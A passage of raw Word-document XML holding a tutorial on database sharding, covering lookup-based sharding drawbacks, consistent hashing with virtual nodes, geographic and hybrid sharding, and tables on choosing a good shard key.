          <w:ilvl w:val="0"/>
          <w:numId w:val="1552"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Maximum flexibility (any key can be on any shard — move keys freely).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E53B66" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1552"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Resharding is "just" updating the mapping (no hash formula constraints).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F249497" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1552"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Can place related keys on the same shard manually (co-locate hot entities).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79654B34" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E030EBD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1553"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Lookup service is a single point of failure (if it dies, no routing possible).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16594473" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1553"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Every query requires a lookup (adds latency — must be cached/fast).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A3B6CE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1553"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Lookup table itself may be large (billions of keys = large mapping).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A90489" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1553"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Lookup service must be highly available and low-latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271FAD73" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.4 Consistent Hashing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054DD8AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The problem with simple hash mod:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167DBAF7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707A5AF6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>hash(key) % 4 shards:  key X → shard 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21008947" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>hash(key) % 5 shards:  key X → shard 3 (DIFFERENT! Must migrate X)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9F30A7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="721A318F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Adding 1 shard remaps ~80% of all keys → massive data migration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EC324F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Consistent hashing solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D52E82E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A1DA58" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Hash ring: 0 ─────────────────────────── 2³²</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C422D33" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="31CCBF17" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shards placed at positions on ring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CBACBA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard A at position: hash("Shard A") = 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAE071B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard B at position: hash("Shard B") = 4000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15535EBE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Shard C at position: hash("Shard C") = 7000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6660E3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="049FB158" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Key placed at position: hash(key) → walk clockwise → first shard encountered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D633E61" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="635CFF08" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Adding Shard D at position 5500:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B0B00D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Only keys between 4000 and 5500 move from Shard C to Shard D.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725E838A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  All other keys stay put!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE93468" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Only ~1/N of keys migrate when adding a node.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438C3A25" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Virtual nodes (vnodes):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759F7867" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1554"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Each physical shard gets 100–200 positions on the ring (not just 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DAF4E4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1554"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Ensures even distribution (a few positions can cluster; many positions smooth it out).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F190D7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1554"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>When a shard is removed, its load spreads evenly across all remaining shards (not just its clockwise neighbor).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194E62EC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t> DynamoDB, Cassandra, Riak, memcached client libraries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F35C7E8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.5 Geo-Based Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D42F6C1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How it works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D01447A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard data by geographic region:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ACA144" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB34FDE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard US: All users with country = US</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130BF143" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard EU: All users with country in EU countries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C334353" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard APAC: All users with country in Asia-Pacific</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA9287" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Advantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC43AE7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1555"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Data locality (user's shard is physically close → low latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1214A569" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1555"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Data sovereignty compliance (EU data stays in EU — GDPR).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1A596D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1555"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Natural affinity (users mostly interact with geographically nearby users).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E591DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Disadvantages:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20191736" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1556"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Uneven shard sizes (US may have 10x the data of APAC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9C433D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1556"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Cross-region queries are expensive (global search, analytics).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC6615" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1556"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Users who travel/relocate complicate routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32751543" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.6 Hybrid Sharding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BD78E4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Real systems often combine strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD39C98" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442B3DEC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Level 1: Geographic sharding (US, EU, APAC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F3643F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Level 2: Hash sharding within each region (customer_id % 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195992BD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="1C5F2BF0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>US region: 10 shards (hash-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A255069" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>EU region: 5 shards (hash-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548A84CA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>APAC region: 3 shards (hash-based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61151F82" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="7320C89D">
          <v:rect id="_x0000_i5760" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0266AE2C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Choosing the Shard Key — The Most Critical Decision</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38348FB3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 What Makes a Good Shard Key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537984F8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>The shard key is the column/attribute used to determine which shard holds a given row. This is the single most important decision in a sharded system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EEFEC0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Properties of a good shard key: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562"/>
        <w:gridCol w:w="6788"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="19AB2D9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AFF1BB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Property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D94EA7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Why It Matters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="15C7940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00DA49" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>High cardinality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C319F4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Many distinct values → data distributes evenly across shards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="7CB9A88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85FFEC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Uniform distribution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B7C97D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>No single value holds disproportionate data → no hot shards</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="5F01F58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846238" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:lastRenderedPageBreak/>
              <w:t>Query affinity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B8EA50" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Most queries include the shard key → single-shard query (efficient)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="28EF9D9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34F62F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Stability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D5677B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Values don't change → no cross-shard migration</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="6036A1C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7CB33F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Natural to the domain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F53D1F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Maps to how the application naturally accesses data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AEA49FB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Shard Key Examples — Good and Bad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7924FC78" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>E-commerce platform:</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716"/>
        <w:gridCol w:w="2536"/>
        <w:gridCol w:w="2553"/>
        <w:gridCol w:w="2545"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="322CFFB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F68314" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Candidate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0F56ED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Distribution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86B8EF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Query Affinity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7185F6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Verdict</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="76F8D18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5BD98B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>user_id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B561D7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Uniform (many users)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7765B9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>High (most queries are user-scoped)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864458" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>✓ Excellent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="2314BE3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8A7DDC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>order_id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0B30B8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Uniform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58EDD8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Low (queries often filter by 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A939A2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
              </w:rPr>
              <w:t>⚠️</w:t>
            </w:r>
            <w:r w:rsidRPr="00875520">
              <w:t xml:space="preserve"> Okay for order-specific queries</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="4ED9F82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D30173" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>country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EB8A11" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
